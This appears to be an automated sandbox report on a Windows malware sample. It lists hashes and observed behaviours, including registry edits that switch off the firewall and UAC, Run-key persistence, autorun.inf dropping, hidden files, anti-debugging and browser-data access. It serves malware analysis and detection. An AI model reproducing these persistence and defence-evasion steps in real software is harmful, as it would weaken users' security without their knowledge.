Analysis
-
max time kernel
140s -
max time network
133s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
10/08/2024, 05:34
Behavioral task
behavioral1
Sample
84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
-
Size
273KB
-
MD5
84f755ce53cb1d70ba895c0f0f629595
-
SHA1
3fdf3e27b1541d52c9a865951a2bdee107c37473
-
SHA256
5f9f5634db8e30d9d11a63baa794863ecf4855637f95e81b6fe667d9f85cab72
-
SHA512
cd2cee1a1a8e4b53118b1a463fcf767a3fc72566663d16f5cbc563d79f2b9c47e4c1a60dbbd4c61faebcc1488a842783f9984433e2d52c2b5148918d3fb99de7
-
SSDEEP
6144:/BNw2vyd8KCg4pI4UJr22Ssdk/JplhD/zntJCkTSwKUxSwc:TwQyfdXCpj7nBNxS
Malware Config
Signatures
-
Modifies firewall policy service 3 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" reg.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies Windows Firewall 2 TTPs 4 IoCs
pid Process 3652 netsh.exe 4164 netsh.exe 1448 netsh.exe 4440 netsh.exe -
Sets file to hidden 1 TTPs 10 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3680 attrib.exe 4608 attrib.exe 4696 attrib.exe 1724 attrib.exe 636 attrib.exe 2548 attrib.exe 4540 attrib.exe 2368 attrib.exe 2732 attrib.exe 532 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe -
Loads dropped DLL 3 IoCs
pid Process 3852 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 516 IEXPLORE.EXE 548 IEXPLORE.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/4036-0-0x00000000001B0000-0x0000000000203000-memory.dmp upx behavioral2/memory/4036-8-0x00000000001B0000-0x0000000000203000-memory.dmp upx behavioral2/files/0x000f0000000233f7-14.dat upx behavioral2/memory/3852-24-0x00000000001B0000-0x0000000000203000-memory.dmp upx behavioral2/memory/4036-223-0x00000000001B0000-0x0000000000203000-memory.dmp upx behavioral2/memory/3852-449-0x00000000001B0000-0x0000000000203000-memory.dmp upx -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\System32\\sysrunc.exe" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\system32\\sysrunc.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe" 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\System32\\sysrunc.exe" 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\system32\\sysrunc.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe" IEXPLORE.EXE -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification F:\autorun.inf attrib.exe File created F:\autorun.inf 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe File created C:\autorun.inf 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe File created D:\autorun.inf 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe File opened for modification C:\autorun.inf attrib.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\SysWOW64\sysrunc.exe cmd.exe File opened for modification C:\Windows\SysWOW64\sysrunc.exe cmd.exe File opened for modification C:\Windows\SysWOW64\sysrunc.exe attrib.exe File opened for modification C:\Windows\SysWOW64\sysrunc.exe attrib.exe File opened for modification C:\Windows\SysWOW64\sysrunc.exe cmd.exe File opened for modification C:\Windows\SysWOW64\sysrunc.exe attrib.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe 4036 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe -
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4444 sc.exe 4680 sc.exe 3388 sc.exe 728 sc.exe 4236 sc.exe 3152 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
Modifies Control Panel 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveActive = "1" 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveTimeOut = "60" 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveActive = "1" 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveTimeOut = "60" 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT = "0" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "953590160" IEXPLORE.EXE Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl reg.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main reg.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main reg.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_FullURL = "yes" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "430033120" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31124199" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_URLinStatusBar = "yes" reg.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\MINIE reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_FullURL = "yes" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "949370971" iexplore.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31124199" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_StatusBar = "yes" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_URLinStatusBar = "yes" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MINIE\ShowStatusBar = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\MINIE reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl reg.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31124199" IEXPLORE.EXE Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MINIE\ShowStatusBar = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{642F1846-56DA-11EF-BB4F-D60584CC4361} = "0" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_StatusBar = "yes" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "949370971" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings 84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
